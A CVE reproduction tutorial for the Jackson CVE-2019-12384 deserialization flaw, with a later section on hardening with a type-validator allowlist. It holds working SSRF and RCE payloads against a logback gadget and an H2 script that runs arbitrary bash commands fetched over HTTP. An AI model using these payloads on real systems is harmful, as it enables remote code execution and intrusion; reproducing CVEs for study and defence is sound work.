
Title: CVE-2019-12384: Reproducing the Jackson deserialization vulnerability


CVE-2019-12384: Reproducing the Jackson deserialization vulnerability

Analysis

According to the Jackson developers, exploiting this vulnerability requires all of the following conditions to hold, which is why it is rated as medium severity:

The target application receives JSON data from an untrusted client;

The target application uses polymorphic type handling (default typing) for properties declared as java.lang.Object;

The target application has at least one usable "gadget" class on the Java classpath. This particular vulnerability depends on several third-party jars: besides Jackson's own jars, logback-core and h2 must both be present.

Environment setup

The third-party libraries used in this article are:

jackson-databind 2.9.8

jackson-annotations-2.9.8.jar

jackson-core-2.9.8.jar

logback-core-1.3.0-alpha4.jar

h2 1.4.199

All of them can be downloaded from http://www.mvnrepository.com.

Vulnerable code

package com.baiyang;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
import org.h2.Driver;

public class Main {

    public static void main(String[] args) {
        // Register the H2 JDBC driver so DriverManager can open jdbc:h2: URLs
        try {
            Class.forName("org.h2.Driver").newInstance();
        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.println("Mapping");

        // This payload is used to reproduce the SSRF
        String SSRF = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://127.0.0.1:4444/~/hacker\"}]";

        // This payload is used to reproduce the RCE
        String RCE = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost/inject.sql'\"}]";

        ObjectMapper mapper = new ObjectMapper();
        // Default typing lets the JSON document name the class to instantiate: this is the vulnerable setting
        mapper.enableDefaultTyping();
        mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);

        System.out.println("Serializing");

        Object obj = null;
        try {
            // Switch between SSRF and RCE here to test the respective payload
            obj = mapper.readValue(RCE, java.lang.Object.class);
        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.println("objectified");

        try {
            System.out.println("stringified: " + mapper.writeValueAsString(obj));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
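The mapper above calls enableDefaultTyping(), which lets the JSON document itself name any class on the classpath, so the only thing standing between the attacker and the logback gadget is the presence of the jar. The following is an added example, not code from the original post or from the Doyensec write-up: it shows the hardened configuration available since Jackson 2.10 (the post uses 2.9.8), where default typing can only be activated together with a PolymorphicTypeValidator allowlist, so the gadget's class name is refused before any constructor or setter runs. The package names com.example and com.example.model are hypothetical.

```java
package com.example;  // hypothetical package, not the post's com.baiyang

import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class HardenedTyping {

    // Constructed input: the same array-shaped type id the post's payloads use
    // (["<class name>", {properties}]), but with no properties at all. Rejection
    // happens on the class name, so a url property would never even be read.
    static final String UNTRUSTED_JSON =
            "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {}]";

    // Jackson 2.10+: default typing may only be enabled together with a validator.
    // BasicPolymorphicTypeValidator denies every type id it has no rule for, so
    // this allowlist admits only the application's own model classes.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")   // hypothetical app package
                .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return mapper;
    }

    // Returns true when the mapper refuses the type id. Jackson reports a denied
    // or unknown class with InvalidTypeIdException, a JsonMappingException subclass.
    static boolean rejectsTypeId(ObjectMapper mapper, String json) {
        try {
            mapper.readValue(json, Object.class);
            return false;   // accepted: this mapper would instantiate the named class
        } catch (JsonMappingException e) {
            return true;    // refused before any constructor or setter ran
        } catch (java.io.IOException e) {
            throw new IllegalStateException("malformed JSON, not a type-id rejection", e);
        }
    }

    public static void main(String[] args) {
        // The logback class is not under com.example.model, so the validator denies
        // the type id whether or not logback-core is present on the classpath.
        System.out.println("hardened mapper rejects gadget: "
                + rejectsTypeId(hardenedMapper(), UNTRUSTED_JSON));
    }
}
```

The same check run against a mapper built with enableDefaultTyping(), as in the post's code, returns false when logback-core is on the classpath, which is the quickest way to confirm which of an application's ObjectMapper instances still need the validator.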

Build steps

This article builds the project in IntelliJ IDEA:

Create a new Java command-line project

Replace the generated main class with the code above

Click the icon highlighted in the red box to open the Project Structure settings

[screenshot: 20190726153817.png]

Follow the steps shown below to add the downloaded external jars to the project

[screenshot: 20190726153826.png]

Attack procedure

Save the following SQL script as inject.sql:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}
$$;
CALL SHELLEXEC('open /Applications/Calculator.app')

Note: in this article the RCE is run on macOS. On other platforms, replace the command passed to CALL SHELLEXEC accordingly.

Run python2 -m SimpleHTTPServer 80 locally to serve inject.sql over HTTP.

RCE payload test

Set the payload in the Java file to RCE, then compile and run the program.

[screenshot: 20190726154643.png]

SSRF payload test

Run nc -l -vv 4444 so the SSRF connection can be observed.

Set the payload in the Java file to SSRF, then compile and run the program.

[screenshot: 20190726155103.png]

References

https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

https://www.anquanke.com/post/id/182695
